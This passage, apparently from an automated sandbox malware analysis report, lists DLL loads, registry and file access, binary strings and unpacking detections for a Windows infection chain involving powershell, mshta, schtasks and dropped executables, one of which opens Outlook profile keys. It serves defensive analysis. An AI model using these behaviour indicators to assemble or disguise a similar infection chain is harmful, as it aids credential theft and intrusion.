                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: sspicli.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: schannel.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: mskeyprotect.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: ntasn1.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: ncrypt.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: ncryptsslp.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: msasn1.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: gpapi.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: uxtheme.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: propsys.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: edputil.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: urlmon.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: iertutil.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: srvcli.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: netutils.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: windows.staterepositoryps.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: wintypes.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: appresolver.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: bcp47langs.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: slc.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: userenv.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: sppc.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: onecorecommonproxystub.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: onecoreuapcommonproxystub.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dll
                                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
                                      Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dll
                                      Source: C:\Windows\System32\mshta.exeSection loaded: version.dll
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                                      Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
                                      Source: Window RecorderWindow detected: More than 3 window changes detected
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                                      Source: 5EfYBe3nch.exeStatic file information: File size 1858048 > 1048576
                                      Source: 5EfYBe3nch.exeStatic PE information: Raw size of dalsczsh is bigger than: 0x100000 < 0x19bc00
                                      Source: Binary string: mozglue.pdbP source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2299017750.000000006F8ED000.00000002.00000001.01000000.0000000E.sdmp
                                      Source: Binary string: ntkrnlmp.pdbx, source: iSHmPkn.exe, 00000010.00000002.2577488231.000000000BEEC000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: nss3.pdb@ source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                      Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: iSHmPkn.exe, 00000010.00000002.2577488231.000000000BEEF000.00000004.00000020.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000002.2577488231.000000000BEEC000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: ntkrnlmp.pdb source: iSHmPkn.exe, 00000010.00000002.2577488231.000000000BEEF000.00000004.00000020.00020000.00000000.sdmp
                                      Source: Binary string: C:\Users\Dan\source\repos\gamee\gamee\obj\Debug\gamee.pdb source: eXbhgU9.exe, 00000011.00000000.2472309641.00000000008D2000.00000002.00000001.01000000.00000011.sdmp
                                      Source: Binary string: nss3.pdb source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                      Source: Binary string: mozglue.pdb source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2299017750.000000006F8ED000.00000002.00000001.01000000.0000000E.sdmp

                                      Data Obfuscation

                                      barindex
                                      Detected unpacking (changes PE section rights)
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeUnpacked PE file: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack :EW;.rsrc:W;.idata :W;zrmackkh:EW;rcriyoua:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;zrmackkh:EW;rcriyoua:EW;.taggant:EW;
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeUnpacked PE file: 5.2.31FYMQUCQX14ZVCZU2HAYNV7V.exe.480000.0.unpack :EW;.rsrc:W;.idata :W;tezivoqu:EW;tcaewlrx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;tezivoqu:EW;tcaewlrx:EW;.taggant:EW;
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 6.2.skotes.exe.fa0000.0.unpack :EW;.rsrc:W;.idata :W;tezivoqu:EW;tcaewlrx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;tezivoqu:EW;tcaewlrx:EW;.taggant:EW;
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 7.2.skotes.exe.fa0000.0.unpack :EW;.rsrc:W;.idata :W;tezivoqu:EW;tcaewlrx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;tezivoqu:EW;tcaewlrx:EW;.taggant:EW;
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeUnpacked PE file: 13.2.GIIIIJDHJE.exe.780000.0.unpack :EW;.rsrc:W;.idata :W;tezivoqu:EW;tcaewlrx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;tezivoqu:EW;tcaewlrx:EW;.taggant:EW;
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 14.2.skotes.exe.fa0000.0.unpack :EW;.rsrc:W;.idata :W;tezivoqu:EW;tcaewlrx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;tezivoqu:EW;tcaewlrx:EW;.taggant:EW;
                                      Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exeUnpacked PE file: 16.2.iSHmPkn.exe.6e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xuvnqsmj:EW;dkjxiybl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xuvnqsmj:EW;dkjxiybl:EW;.taggant:EW;
